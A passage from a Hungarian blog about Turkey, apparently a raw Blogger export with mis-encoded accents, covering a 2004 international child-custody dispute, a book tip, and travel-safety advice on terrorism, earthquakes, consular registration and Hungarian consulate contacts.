megszצktessיk. A tצrצk lap az ankarai magyar nagykצvetsיget is megkיrdezte, ott megerősםtettיk, hogy a nő יs a gyerek valףban a nagykצvetsיgen tartףzkodik, de hozzבtettיk, hogy a fיrfi בllםtבsבval ellentיtben יppen az apa volt az, aki a gyereket jogellenesen klfצldre vitte Magyarorszבgrףl, ahol az anyjבval יlt.</div><div align="center"> <br /><span style="font-size:130%;"><strong>Hבborת egy gyerekיrt Ankarבban</strong></span></div><div align="justify"></div><div align="center">Nיpszava, 2004. augusztus 21.</div><div align="justify"> <br />Tצrצk lapjelentיs szerint egy magyar nő hamis papםrokkal akarta kiszצktetni gyerekיt Tצrצkorszבgbףl. A Yeni Safak pיnteki szבmבban azt םrja, hogy egy Raskף Emese nevű magyar בllampolgבrsבgת nő, szlei segםtsיgיvel, hamis papםrokkal akarta elvinni Ankarבbףl Szofi nevű kislבnyבt, akinek tצrצk az apja. A fיrfi ismert ember, Fatih ײzbas, egykori birkףzף olimpikon יs Eurףpa bajnok. ײzbas azt mondta a tצrצk napilapnak, hogy az ankarai magyar nagykצvetsיg tettestבrs az gyben, mert segיdkezett a kiszצktetיsben, de a replőtיren kiderlt az תgymond csalבs, mire a magyar diplomatבk a nagyszlőket, a nőt יs a gyereket a nagykצvetsיgre menekםtettיk. ײzbas azt בllםtja, hogy az anya korבbban lemondott a most hבrom יves kislבny felgyeleti jogבrףl יs az apבnבl hagyta Nיmetorszבgban. A nő, aki most תjra terhes ugyanettől a fיrfitől יs a hatodik hףnapban van, ragaszkodik lבnyבhoz יs nem akar Tצrצkorszבgban יlni. A fיrfi viszont szםvesen יlne a csalבdjבval, akבr Nיmetorszבgban is. ײzbas az תjsבgon keresztl fordult a tצrצk illetיkesekhez, ne hagyjבk, hogy a gyereket hamis papםrokkal megszצktessיk. A tצrצk lap az ankarai magyar nagykצvetsיget is megkיrdezte, ott megerősםtettיk, hogy a nő יs a gyerek valףban a nagykצvetsיg יpletיben tartףzkodik, de hozzבtettיk, hogy a fיrfi בllםtבsבval ellentיtben יppen az apa volt az, aki a gyereket jogellenesen klfצldre vitte Magyarorszבgrףl, ahol az anyjבval יlt. Ezיrt Raskף Emese pert indםtott Tצrצkorszבgban a kislבny hazavitele יrdekיben. A bםrףsבgi hatבrozat megszletיsיig a nagykצvetsיg nem adja ki a gyereket - םrja a tצrצk lap. <br /> <br /></div><div align="center"><strong><span style="font-size:130%;">KI KORֱN KEL, ARANYAT LEL</span></strong></div><div align="center"><strong><span style="font-size:130%;"></span></strong></div><div align="center"><strong><span style="font-size:130%;">A BLOG OLVAS׃I ERRE ֹBREDTEK 2004. AUGUSZTUS 20-ֱN</span></strong> </div><div align="center"></div> <br /> <br /><div align="justify"></div><div align="justify">Egy tצrצk napilap mai szבmבban Fatih ײzbas volt birkozף vilבgbajnok" szםvszorםtף" tצrtיnetיt ismerteti Behcet Gngצr tudףsםtבsa.</div><div align="justify"> <br />A Yeni Safak szerint Raskף Emese magyar בllampolgבr יs szlei hamis papםrokkal, az ankarai magyar nagykצvetsיg aktםv kצzreműkצdיsיvel megprףbבltבk kiszצktetni Tצrצkorszבgbףl ײzbas יs Raskף Emese Szofi nevű kislבnyבt. Az ankarai replőtיren fיny derlt a csalבsra יs a magyar diplomatבk a csalבdot a nagykצvetsיgre menekםtettיk. A bםrףsבgi hatבrozat megszletיsיig a nagykצvetsיg nem akarja kiadni a gyermeket. ײzbas szerint יdesanyja lemondott a 2001-ben szletett gyermek feletti felgyeleti jogבrףl יs otthagyta őt Nיmetorszבgban. Az anya, aki 6 hףnapos terhes, nem akar Tצrצkorszבgban יlni, mondja ײzbas, de ő szםvesen יlne csalבdjבval Nיmetorszבgban. ײzbas felhםvבssal fordult a tצrצk illetיkesekhez: ne hagyjבk, hogy leבnyבt hamis papםrokkal megszצktessיk.</div><div align="justify"> <br />A magyar kצvetsיg annyit kצzצlt az gyről, hogy Fatih ײzbas volt az, aki a kislבnyt jogellenesen klfצldre vitte Magyarorszבgrףl, ahol יdesanyjבval יlt, ezיrt Raskף Emese pert indםtott Tצrצkorszבgban Szofi hazahozatala יrdekיben. A kיt magyar בllampolgבr a nagykצvetsיgen tartףzkodik, erősםtette meg a lapnak nyilatkozף magyar diplomata. <br /> <br /></div><div align="justify"></div><div align="justify">A Hrriyet napilap ugyancsak 20-בn hoz jף nagy cikket az gyről Kadir Ercan tollבbףl ("Milli gresciye Macar es oyunu"). Nem tudom belinkelni, mivel a Hrriyet on-line kiadבsבt hףnapok ףta nem sikerl elיrnem. A cikk siralmas. (Tצrצk Macsף) Ercan logikבja nagyon egyszerű: aki tצrצk, plusz vilבgbajnok birkףzף, annak mindig igaza van. Meg sem fordul a fejיben, hogy mבskיnt is lehetne. Nem szםvesen hivatkozom arra, hogy kedvelem a tצrצkצket - vיgl is ezיrt csinבltam Tצrצkorszבg barבtainak ezt a blogot. De ez a fogalmazvבny Tצrצkorszבg egyik legfontosabb napilapjבban annyira "tצrצk", annyira tkrצzi az uralkodף mentalitבst! Meg persze a tצrצk תjsבgםrבs egy - nem is kis - rיszיnek szakmai szםnvonalבt.Mיg ideםrnבm a Hrriyet impresszumבbףl az alבbbiakat: "Hrriyet, basin meslek ilkelerine uymaya sצz vermistir", ami nagyjבbףl annyit tesz, hogy "a lap tiszteletben tartja az תjsבgםrבs szakmai kritיriumait". Gondolom, ezt folyamatban kיpzelik el, amelynek most az elejיn tartanak. Mondjuk, eddig sem voltam lelkes olvasףjuk. Persze, ez a fajta תjsבgםrבs Magyarorszבgon is virבgzik. <br /> <br />Aztבn voltak mיg az gyről televםziףs hםradבsok is. </div><div align="justify"></div><div align="justify"></div><div align="justify">A nagykצvetsיg 21-יn sajtףkצzlemיnyt adott ki, ennek lיnyege, hogy a sajtף fordםtva l a bilin (jerevבni rבdiף), van gy, de nem Tצrצkorszבgban, hanem Magyarorszבgon raboltבk el a kislבnyt, az gyben meg talבn dצntsצn a tצrצk bםrףsבg, ha mבr győzצtt a jogבllam, addig meg a tצrצk sajtףnak nem kellene a kצzvיlemיnyt feleslegesen lבzםtania. A sajtףkצzlemיny, ahogy lבttam, sehol nem jelent meg, de ez nem Tצrצkorszבg-specifikus, mבr Hasek is leםrta, ahogy Katz tבbori lelkיsz belekiabבl a lבmpaernyőbe. Ettől mיg a kצvetsיgnek igaza van, talבn a fggetlen tצrצk bםrףsבg, ha volna szםves dצnteni, hogy hova kell adni a gyereket, akit בllandף lakhelyיről, anyja engedיlye יs tudomבsa nיlkl Tצrצkorszבgba vittek. <br /> <br />Tanבcsom azoknak, akik potenciבlis tצrצk fיrjjel/barבttal kapcsolatban kיszlnek fontos dצntיsekre: A szerelem ףriבsi dolog, valףban elvileg mindegy, hogy a partner magyar, tצrצk, vagy mבs. De tיnylegesen vannak civilizבciףs, kulturבlis יs mבs klצnbsיgek. Ezeket meg kell ismerni a valףsבgban, mיg mielőtt az "יletre szףlף dצntיsek" megszletnיnek. A Raskף-gy csak csepp a tengerben. <br /> <br /></div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="left"><a href="http://www.yenisafak.com.tr/arsiv/2004/agustos/20/g10.html"><span style="font-size:130%;"><strong>Şampiyonun evlat drami</strong></span> </a></div><div align="left">A Yeni Safak cikke, 2004. augusztus 20.</div><div align="justify"></div> -false - - - - - -Efendi - -2004-08-26T02:19:32+02:00 -2004-08-26T00:22:32Z -2004-08-26T00:22:32Z - -tag:blogger.com,1999:blog-7074887.post-109347975242071079 -Kצnyvajבnlף - Germanus Gyula: A fיlhold fakף fיnyיben - -
    A vilבghםrű orientalista תtikalandjai - Magyar Elektronikus Kצnyvtבr on-line -
    -
    -
    -false -
    - - - -Efendi - -2004-08-23T13:00:00+02:00 -2005-08-03T12:20:58Z -2004-08-13T12:54:10Z - -tag:blogger.com,1999:blog-7074887.post-109240165099005058 -Terrorizmus יs mבs veszיlyek - figyelmeztetיsek, tanבcsok/Magyar בllampolgבrok יrdekeinek vיdelme Tצrצkorszבgban יs ֹszak-Cipruson -<div align="justify"><span style="color:#ff0000;"></span></div><div align="justify"><strong><span style="color:#ff0000;">LEGFRISSEBB HֽR! </span></strong></div><div align="justify"></div><div align="justify"><strong><span style="color:#000000;">2002. aug. 2.</span></strong></div><div align="justify"><br /></div><div align="justify"><strong></strong></div><div align="justify"><strong></strong></div><div align="justify"><strong></strong></div><div align="justify"><strong></strong></div><div align="justify">Kilenc szemיly, kצztk egy francia turista kצnnyebb sיrlיseket szenvedett kיt robbanבs kצvetkeztיben Antalyבban. A vבros egyik kצzponti terיn (az ףratoronnyal szemben lיvő szobor előtt) a szemetesek יppen a szemיtkosarat rםtettיk, amikor az felrobbant. Nagyjבbףl egyidejűleg a Dogu Garaji melletti fűszerbazבr kצzelיben szintיn egy kuka robbant. Az antalyai rendőrfőnצk helyettese szerint eddig nem talבltak merיnyletre utalף jeleket. Azt sem tartotta kizבrtnak, hogy valamilyen aerosolos palack robbant fel a nagy hősיgben. </div><div align="justify"><br /></div><div align="justify">Tצrצkorszבg turistבk בltal lבtogatott vidיkein a legsתlyosabb merיnyletet jתlius kצzepיn hajtottבk vיgre Kusadasiban: egy kisbusz felrobbantבsa kצvetkeztיben צt ember - kצzצttk egy םr יs brit בllampolgבr - יletיt vesztette.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify"><strong><span style="color:#ff0000;">FIGYELEM!</span></strong></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong><br /></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong></div><div align="justify"><strong><span style="color:#ff0000;">IZMIRBEN 2005. AUGUSZTUS 11-21. KײZײTT KERL SOR A 23. UNIVERSIֱDֹRA, AMELYRE 8000 EGYETEMISTA SPORTOL׃ ֹS NAGYON SOK SZURKOL׃ ֹRKEZIK A VILֱG 180 ORSZֱGֱB׃L (MAGYARORSZֱG IS 83 VERSENYZŐVEL LESZ JELEN). IZMIR ֹS KײRNYֹKE TEHֱT EBBEN AZ IDŐBEN ELֹG ZSFOLT LESZ, MֱSRֹSZT PEDIG TALֱN NAGYOBB LESZ A TERRORIZMUS VESZֹLYE. EZֹRT, HA NEM MUSZֱJ, NE UTAZZ IZMIRBE ֹS KײRNYֹKֹRE EBBEN AZ IDŐPONTBAN, HA MEG OTT LESZEL, LֹGY ׃VATOS!</span></strong></div><div align="justify"><br /></div><div align="justify"></div><div align="justify"><strong>FONTOS VֱLTOZֱS! </strong></div><div align="justify"><br /></div><div align="justify"><strong><span style="color:#ff0000;">A magyar klgy jתlius vיgיn a fokozott biztonsבgi kockבzatot rejtő orszבgok kצzי sorolta Tצrצkorszבgot! </span></strong><strong><span style="color:#ff0000;"><a href="http://www.kulugyminiszterium.hu/kum/hu/jobb/Konzuli_informaciok/Utazas_kulfoldre/Biztonsagi_kockazatot_jelento_tersegek/">Link יs tudnivalףk ITT!</a></span></strong></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong><br /></div><div align="center"></div><div align="center"><strong><span style="color:#ff0000;"></span></strong></div><div align="center"><strong><span style="color:#ff0000;"></span></strong></div><div align="center"><strong><span style="color:#ff0000;"></span></strong></div><div align="center"><strong><span style="color:#ff0000;"></span></strong></div><div align="center"></div><div align="center"></div><div align="center"></div><div align="center"><span style="color:#ff0000;"><strong></strong></span></div><div align="justify"><span style="color:#ff0000;"><span style="color:#333333;">A magyar KM figyelmeztetיse arra utal, hogy ףvatosnak יs kצrltekintőnek kell lenned, ha Tצrצkorszבgban turistבskodsz. </span></span><span style="color:#ff0000;">Elsősorban kיt veszיly fenyegethet: az egyik a terrorizmus, a mבsik a fצldrengיs.</span></div><div align="justify"><span style="color:#ff0000;"></span><br /></div><div align="justify"><span style="color:#ff0000;"></span></div><div align="justify"><span style="color:#ff0000;"></span></div><div align="justify"><span style="color:#ff0000;"></span></div><div align="justify"><span style="color:#ff0000;"><span style="color:#333333;">Ezיrt lehetőleg kerld az amerikai, brit, izraeli, olasz rendezvיnyeket יs יrdekeltsיgeket, tovבbbב Tunceli, Van, Hakkari, Elazig, Sirnak tartomבnyokat, valamint Diyarbakir tartomבny vidיki rיszeit. <span style="color:#cc0000;">Ha Tצrצkorszבgban vagy, hallgasd a hםreket יs itt a blogon tבjיkozףdj. Erre hםvd fel azoknak a barבtaidnak a figyelmיt is, akik Tצrצkorszבgba kיszlnek!</span> </span><span style="color:#333333;">ֹjszaka ne utazz kocsival. Baj esetיn mindig tartsd magad az helyi hatףsבgok utasםtבsaihoz. Ha igazoltatnak, tűrd megadבssal, tanתsםts egyttműkצdő magatartבst. <strong>ֽrd fel a tצrצkorszבgi magyar kיpviseletek koordinבtבit, amelyeket itt a postban megtalבlsz.</strong></span></span></div><div align="justify"><br /></div><div align="justify"></div><div align="justify"></div><div align="justify"><span style="color:#ff0000;"><span style="color:#333333;"></span></span></div><div align="justify"></div><div align="justify"><span style="color:#ff0000;"><strong></strong></span></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong></div><div align="justify"><span style="color:#000000;">Jף, ha tudod: a 2004 karבcsonyi dיlkelet-בzsiai szצkőבrhoz hasonlף mיretű termיszeti katasztrףfa (fצldrengיs) Tצrצkorszבgban is <span style="color:#ff0000;">BֱRMIKOR</span> bekצvetkezhet. Isztambul klצnצsen veszיlyeztetett, szinte biztosra jףsolnak ott egy igen pusztםtף erejű - szבzezres/milliףs nagysבgrendű בldozattal jבrף - fצldrengיst (pl. <a href="http://www.radio.hu/index.php?cikk_id=120068">Gerhard Berz</a> ). Ne bםzz abban, hogy elkerl a baj: jףbarבtom barבtja nיhבny יve egy צsszeomlott tצrצkorszבgi szבllodבban lelte halבlבt. </span></div><div align="justify"><span style="color:#000000;"><br /></span></div><div align="justify"><strong><span style="color:#000000;"></span></strong></div><div align="justify"><strong><span style="color:#000000;"></span></strong></div><div align="justify"><strong><span style="color:#000000;">Hogyan tudsz a veszיlyekre felkיszlni?</span></strong></div><div align="justify"><br /></div><div align="justify"><strong></strong></div><div align="justify"><strong><span style="color:#000000;"></span></strong></div><div align="justify"><strong></strong></div><div align="justify"><strong>Előszצr is <span style="color:#ff0000;">regisztrבltasd magad</span>, hogy tudjבk, adott esetben Tיged is keresni kell!</strong></div><div align="justify"><strong></strong><br /></div><div align="justify"><strong></strong></div><div align="justify"><strong></strong></div><div align="justify"><strong><span style="color:#000000;">2005. februבr 15-től vבlsבgkezelő kצzpont műkצdik a Magyar Klgyminisztיriumban. Cיlja, hogy katasztrףfבk esetיn az eddiginיl jobban lehessen ellבtni klfצldצn a magyar בllampolgבrok vיdelmיt. A klgy honlapjבn lיvő kיrdőםvet kitצltve megadhatod utazבsi cיlpontjaidat, a magad יs a baj esetיn יrtesםtendő szemיlyek adatait, elיrhetősיgיt. Az ombudsman szerint a rendszer megfelel az adatvיdelmi kצvetelmיnyeknek.</span></strong></div><div align="justify"><strong></strong><br /></div><div align="justify"><strong><span style="color:#000000;"></span></strong></div><div align="justify"><strong></strong></div><div align="justify"><strong><span style="color:#ff0000;">Kיrlek, fogadd meg az alבbbi tanבcsaimat:</span></strong></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong><br /></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong></div><div align="justify"><strong></strong></div><div align="justify"><strong><span style="color:#ff0000;">1. lיpיs:</span> <a href="http://www.deprem.gov.tr/linkhart.htm">EZEN A LINKEN</a> nיzd meg, hogy tצrצkorszבgi tartףzkodבsi helyed milyen szםnű צvezetbe tartozik a tיrkיpen (a nagy tיrkיpen az egyes kormבnyzףsבgokra klikkelve rיszletesebb helyi tיrkיpet is lבthatsz). Ha utazבsi cיlpontod piros vagy rףzsaszםn צvezetben van (ezek a legveszיlyesebbek), vagy ha בtutazol Isztambulon, mindenkיppen ajבnlom a regisztrבciףt (ami a tצbbi צvezet esetיn sem בrt).</strong></div><div align="justify"><strong></strong><br /></div><div align="justify"><strong></strong></div><div align="justify"><strong></strong></div><div align="justify"><strong><span style="color:#ff0000;">2. lיpיs:</span> <a href="http://www.kum.hu/konzulivedelem/">EZEN A LINKEN</a> tצltsd ki a klgy kיrdőםvיt, kldd el, majd nyomtasd ki, םrd alב יs add fel postבn is a megadott cםmre (ez utףbbi egyelőre nyilvבn azיrt kell, mert az elektronikus alבםrבssal kapcsolatos gyek gyatrבn mennek Magyarorszבgon).</strong></div><div align="justify"><strong></strong><br /></div><div align="justify"><strong></strong></div><div align="justify"><strong><span style="color:#000000;"></span></strong></div><div align="justify"><strong><span style="color:#ff0000;">3. lיpיs:</span> Olvasd el a lenti tanבcsaimat arrףl, hogyan viselkedj fצldrengיs esetיn. Ha azokat ki tudod egיszםteni, םrj nekem <a href="mailto:efendi_online@yahoo.com">ERRE A CֽMRE</a> vagy ide a postra, hogy mבsoknak is segםts.</strong></div><div align="justify"><br /></div><div align="justify"><strong></strong></div><div align="justify"><strong></strong></div><div align="justify"><strong><span style="color:#ff0000;">4. lיpיs:</span> Mielőtt elutazol Tצrצkorszבgba, a magyar klgyצn kםvl mיg valakinek (csalבd, barבt) hagyd meg ottani tartףzkodבsi helyedet יs elיrhetősיgedet, biztos, ami biztos.<br /></strong></div><div align="justify"><br /></div><div align="justify"></div><div align="justify"><span style="color:#ff0000;"><strong></strong></span></div><span style="color:#ff0000;"><em><div align="justify"><br /></em></span><span style="color:#333333;"></span></div><div align="justify"><span style="color:#cc0000;"></span></div><div align="center"><span style="font-size:130%;color:#cc0000;"><strong>FEKETE KR׃NIKA:</strong></span></div><div align="justify"><strong><span style="font-size:130%;color:#cc0000;"></span></strong></div><div align="center"><strong><span style="font-size:130%;color:#cc0000;">2005.</span></strong></div><strong><span style="color:#cc0000;"></span></strong><div align="justify"></div><div align="justify">Jתlius 16-בn<br /></div><div align="justify"><span style="color:#cc0000;"><strong></strong></span></div><span style="color:#cc0000;"><strong><div align="justify"><strong><span style="color:#000000;"><a href="http://index.hu/politika/bulvar/bulvarhirek/?main:2005.07.10.&228754">Balesetet szenvedett egy nיgyfős magyar csalבd Tצrצkorszבgban</a> </span></strong><strong>2005. jתlius 10.</strong></div><strong></strong><div align="justify"><br /></div><div align="justify"><strong></strong></div><div align="justify"><strong></strong></div><div align="justify"><strong><a href="http://index.hu/politika/kulhirek/?main:2005.07.10.&amp;228749">Nincs magyar sיrltje a tצrצkorszבgi robbantבsnak</a> </strong><strong>2005. jתlius 10.</strong></div><div align="justify"></div><div align="justify"></div><div align="justify">2005. בprilis 30-בn</strong> bombבt helyeztek el Kusadasiban az Atatrk-szobornבl, amely felrobbant יs a helyszםni biztosםtבst vיgző rendőrצk kצzl egyet megצlt, nיgyet megsebesםtett.</span></div><div align="justify"><br /></div><div align="justify"><span style="color:#cc0000;"></span></div><div align="center"><span style="color:#cc0000;"><strong>2004.</strong></span></div><span style="color:#333333;"><span style="color:#cc0000;"></span></span><div align="justify"><br /></div><div align="justify"><span style="color:#333333;"><span style="color:#cc0000;">Okt. 4. Az al-Kaida merיnyleteket akar vיgrehajtani Tצrצkorszבgban. </span></span></div><div align="justify"><span style="color:#333333;"><span style="color:#3333ff;">LINK</span> <a href="http://index.hu/politika/kulhirek/?main:2004.10.04.&196090">magyar</a> <a href="http://www.zaman.com.tr/?bl=haberler&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;alt=&trh=20041004&amp;hn=97816">tצrצk</a></span></div><div align="justify"></div><div align="justify"><span style="color:#333333;">A Zaman napilap hםre szerint a merיnylők cיlpontjai kצzי tartoznak a hatבrבtkelőhelyek, a replőterek, valamint az Irakban katonבkat בllomבsoztatף koalםciףs orszבgok (tehבt pl Magyarorszבg) tצrצkorszבgi nagykצvetsיgei יs kיpviseletei. Kםvlבllףnak nehיz megםtיlni, ez jelenti-e az eddigi fenyegetettsיg nצvekedיsיt Tצrצkorszבgban, hiszen mostanra mבr mindenkit megfenyegettek, s sok orszבgban (vagy azok csapatai, יrdekeltsיgei ellen) voltak is terrorista akciףk. gyhogy vבrjuk meg a tovבbbi יrteslיseket, csak semmi pבnik, magyarok vagyunk.</span></div><div align="justify"><span style="color:#333333;"><span style="color:#cc0000;"></span></span><br /></div><div align="justify"><span style="color:#333333;"><span style="color:#cc0000;">Okt. 2. <span style="color:#333333;">Tegnap az al-Kaida az Egyeslt ֱllamokkal יs szצvetsיgeseivel - kצztk Magyarorszבggal - szembeni szervezett ellenבllבsra hםvta fel a muzulmבn vilבgot. (Link <a href="http://www.nol.hu/cikk/335131/">itt</a>.) Egy okkal tצbb az ףvatossבgra, Tצrצkorszבgban is.</span> </span></span></div><div align="justify"><span style="color:#333333;"><span style="color:#cc0000;"></span></span></div><div align="justify"><span style="color:#333333;"><span style="color:#cc0000;">Okt. 5. <a href="http://www.nol.hu/cikk/335312/">Biztonsבgi jelzיs a magyar klkיpviseleteknek </a></span></div><p align="justify"><span style="color:#333333;"><span style="color:#ff0000;">Szept. 29.</span> Kיső dיlutבn, este hבromnegyed 7 magassבgבban a Richter-skבla szerint 4.5 erőssיgű fצldrengיs volt Isztambulban, főleg Kartal, Pendik יs Yakacik kerletekben lehetett יrezni. A telefonvonalak ezt kצvetően becsődצltek, Kartalban יs Yakacikban az emberek pבnikszerűen az utcבra menekltek. A rengיs epicentruma a Mבrvבny-tenger tיrsיgיben volt. Isztambulban jף pבr יve szבmםtanak igen pusztםtף erejű fצldrengיsre, mivel a tektonikai tצrיsvonalak arrafelי (is) hתzףdnak. Szצrnyű, de a becslיsek szerint ilyen esetben az בldozatok szבmבt szבzezrekre becslik. Ezיrt is volt a pבnik: יvek ףta minden hיten azzal foglalkozik a tצrצk sajtף, hogy sתlyos fצldrengיs lesz Isztambulban, a felkיszlיs meg olyan, amilyen, םgy hבt nem csoda, hogy mindenki bekattan, ha reng a fצld. Ha a fצldrengיsről tצbbet akarsz tudni, nיzd meg a <a href="http://torokorszag.lap.hu/">torokorszag.lap.hu oldalon</a> a "Fצldrengיsveszיly" blokkban a linkeket, mindent megtalבlsz. Amתgy nיgyes nagysבg kצrli rengיs minden hיten van Tצrצkorszבgban. </span></p><p align="justify"><span style="color:#333333;">Szept. 28. Nיgy תn. hangbomba robbant: Isztambulban (Kadikצy), Adanבban יs Izmirben, mindhבrom a brit HSBC bank fiףkjבnבl, egy pedig Ankarבban a Tצrצk-USA Kulturבlis Kצzpontnבl a vבroskצzpontban. Főleg anyagi kבrok vannak. <strong>Tanבcsom, mint korבbban: kerld Tצrצkorszבgban az USA, a brit יs az izraeli יrdekeltsיgeket</strong> (kיpviseletek, bankok - Citibank יs HSBC, e kיt bank VIP-vבrףja az isztambuli reptיren, konzulבtusok, kulturבlis kצzpontok, rendezvיnyek).</span></p><p align="justify"><span style="color:#333333;">Szept.20. <a href="http://haber.tnn.net/haber_detay.asp?ID=1042710&cat=ENG">Repeszgrבnבt robbant egy rendőrautף alatt Mersinben</a> - 13 sebeslt, tצbben sתlyosan megsיrltek. A rendőrsיg egy popkoncert biztonsבgבra vigyבzott. Az autף a koncert helyszםnיn kialakםtott biztonsבgi kordonon kםvl volt. Az elmתlt hetekben kיt robbantבs is volt Mersinben, az egyik a kormבnypבrt irodבjבnבl, a mבsik egy banknבl.</span></p><p align="justify"><span style="color:#333333;">Szept. 7. <a href="http://www.nol.hu/cikk/331835/">Mיrgező rakomבny sllyedt el a tצrצk partoknבl</a> "Tilos bתvבrkodni, halבszni vagy megenni az Iskenderuni צbצlből szבrmazף halakat" (nבlunk ciבnnak, ott krףmmal etetik a halakat, az emberi felelőtlensיg azonban ugyanaz) <a href="http://www.bianet.org/2004/08/01_eng/news42820.htm">Mediterranean, Time Bomb!</a> </span></p><p align="justify"><span style="color:#333333;">Aug. 31. Fegyveres צsszetkצzיsek Hakkariban Ha nem muszבj, ne utazz ebbe a tartomבnyba. Inkבbb nיzd meg a<a href="http://www.moonandstarsproject.org/fests/2004_filmfest_hakkaride_bir_mevsim.shtml"> "Hakkari'de bir mevsim"</a> (1982) c. zseniבlis filmet.</span></p><p align="justify"><span style="color:#333333;">Aug. 23. Robbanבs Antalyבban, az ףvבrosi yachtkikצtőben: egy halott יs egy sebeslt. A robbanבs oka ismeretlen, azt sem tudni, merיnylet volt-e vagy sem.</p><div align="justify"><span style="color:#333333;">Aug. 15. </span><a href="http://index.hu/politika/bulvar/bomb0815/"><span style="color:#333333;">Bombariadף a Lufthansa יs a THY Isztambul-Frankfurt jבratבn, kיt kיnyszerleszבllבs Budapesten!</span></a><span style="color:#333333;"> </span><span style="color:#333333;">Az amerikai Klgy figyelmeztetיse: merיnyletek lehetsיgesek augusztus 15. kצrl.</span></div><div align="justify"><br /></div><div align="justify"><span style="color:#333333;">Aug. 11. Pokolgיp kיt kis isztambuli szבllodבban - egy irבni halott, tצbb klfצldi turista megsebeslt.</span></div></span><div align="justify"><br /></div></span><div align="justify"><span style="color:#cc0000;"><strong>3. Hogyan előzd meg a bajt יs mit tegyיl, ha mבr nyakig vagy benne?</strong></span> </div><div align="justify"><br /></div><div align="center"><strong><em>Az alבbbiakat nyomtasd ki יs vidd magaddal Tצrצkorszבgba!</em></strong></div><div align="justify"><br /></div><div align="justify">Tצrצkorszבg 81 tartomבnya kיt magyar konzuli kerletre van felosztva. Az egyikben a bajba jutott magyar בllampolgבrok problיmבival az isztambuli magyar főkonzulבtus, a mבsikban az ankarai magyar nagykצvetsיg konzuli osztבlya foglalkozik. Tehבt ha problיmבd van, <strong>ahhoz a klkיpviselethez fordulj, amelyiknek a konzuli kerletיben tartףzkodsz.<br /></strong><br /></div><div align="justify"></div><div align="justify">Az isztambuli főkonzulבtus konzuli kerletיn bell hבrom magyar tiszteletbeli konzul műkצdik (Izmir, Tekirdag, Ktahya), mindegyiknek van konzuli kerlete (pבr tartomבny), amelyben illetיkes eljבrni a magyar בllampolgבrok יrdekeinek vיdelmיben. Tehבt problיma esetיn őket is keresheted, nemcsak az isztambuli főkonzulבtust. Rבadבsul ők kצzelebb is vannak fצldrajzilag, gyorsabban tudnak segםteni. </div><div align="justify"><br /></div><div align="justify"><span style="color:#ff0000;">Isztambuli magyar főkonzulבtus</span> <a href="http://www.kulugyminiszterium.hu/kum2005/Templates/wordsablon.aspx?NRMODE=Published&amp;NRORIGINALURL=%2fkum%2fhu%2fbal%2fKepviseletek%2fMagyar_kulkepviseletek_kulfoldon%2fNagykovetsegek_es_Fokonzulatusok%2feuropa%2ehtm&NRNODEGUID=%7bD5E09E46-811C-4285-8D14-BF068F663154%7d&amp;NRCACHEHINT=Guest#Torokorszag">link</a> <span style="color:#ff0000;">Figyelem! A cםm יs a telefonszבmok megvבltoztak!<br /></span></div><div align="justify"><span style="color:#ff0000;"><span style="color:#000000;">j cםm: METROCITY Millenium A Blok<br />Bykdere Cad. No. 171.<br />1. LEVENT – 34330 ISTANBUL</span></span></div><div align="justify"><span style="color:#ff0000;"><span style="color:#000000;"></span></div></span><div align="justify">Tel. (90)(212) 344 1265, (90)(212) 344 1266, konzuli rיszleg: (90)(212) 344 1267 יs (90)(212) 344 1268</div><div align="justify"></div><div align="justify">gyelet: (90)533 375 8715<br />Fax: hivatal: (90)(212) 344 1270 konzuli: (90)(212) 344 1269<br />E-mail: <a href="mailto:huconsist@isnet.net.tr">huconsist@isnet.net.tr</a><br /><strong>konzuli kerlet</strong> (tartomבnyok): Afyon, Amasya, Antalya, Aydin, Balikesir, Bartin, Bayburt, Bilecik, Bolu, Burdur, Bursa, Canakkale, Cankiri, Corum, Denizli, Edirne, Eskisehir, Giresun, Gmshane, Isparta, Icel (Mersin), Istanbul, Izmir, Karaman, Kastamonu, Kirklareli, Kocaeli, Konya, Ktahya, Manisa, Mugla, Ordu, Rize, Sakarya, Samsun, Sinop, Tekirdag, Tokat, Trabzon, Usak יs Zonguldak.</div><div align="justify"><br />Az isztambuli magyar főkonzulבtus konzuli kerletיn bell műkצdő hבrom magyar tiszteletbeli konzul illetיkessיgi terlete:<br /><br /><span style="color:#ff0000;">Erdogan Erken tb. konzul, Tekirdag</span> <a href="http://www.kulugyminiszterium.hu/kum2005/Templates/wordsablon.aspx?NRMODE=Published&NRORIGINALURL=%2fkum%2fhu%2fbal%2fKepviseletek%2fMagyar_kulkepviseletek_kulfoldon%2fTiszteletbeli_konzulatusok%2feuropa%2ehtm&amp;NRNODEGUID=%7bE18F34A9-D68A-4091-9B19-AC756BFBE88C%7d&NRCACHEHINT=Guest#Torokorszag">link</a> </div><div align="justify">telefon: (90)(282) 2630313, (90)(282) 2611549</div><div align="justify">fax: (90)(282) 2613560</div><div align="justify">cםm: Macaristan Cumhuriyeti Fahri Konsoloslugu, Orduevi Caddesi Gnaydin Apt. Insaniye Sokak No 21. Tekirdag<br /><strong>konzuli kerlet</strong> (tartomבnyok): Tekirdag, Edirne, Kirklareli<br /><br /><span style="color:#ff0000;">Erdal Keresteci tb. konzul, Izmir</span> <a href="http://www.kulugyminiszterium.hu/kum2005/Templates/wordsablon.aspx?NRMODE=Published&amp;NRORIGINALURL=%2fkum%2fhu%2fbal%2fKepviseletek%2fMagyar_kulkepviseletek_kulfoldon%2fTiszteletbeli_konzulatusok%2feuropa%2ehtm&NRNODEGUID=%7bE18F34A9-D68A-4091-9B19-AC756BFBE88C%7d&amp;NRCACHEHINT=Guest#Torokorszag">link</a> </div><div align="justify">telefon: (90)(232) 4212861</div><div align="justify">fax: (90)(232) 4219762</div><div align="justify">cםm: Macaristan Cumhuriyeti Fahri Konsoloslugu, Atatrk Bulvari, Keresteci Apt. No: 222. Kat 5, Gndogdu - Izmir<br /><strong>konzuli kerlet</strong> (tartomבnyok): Izmir, 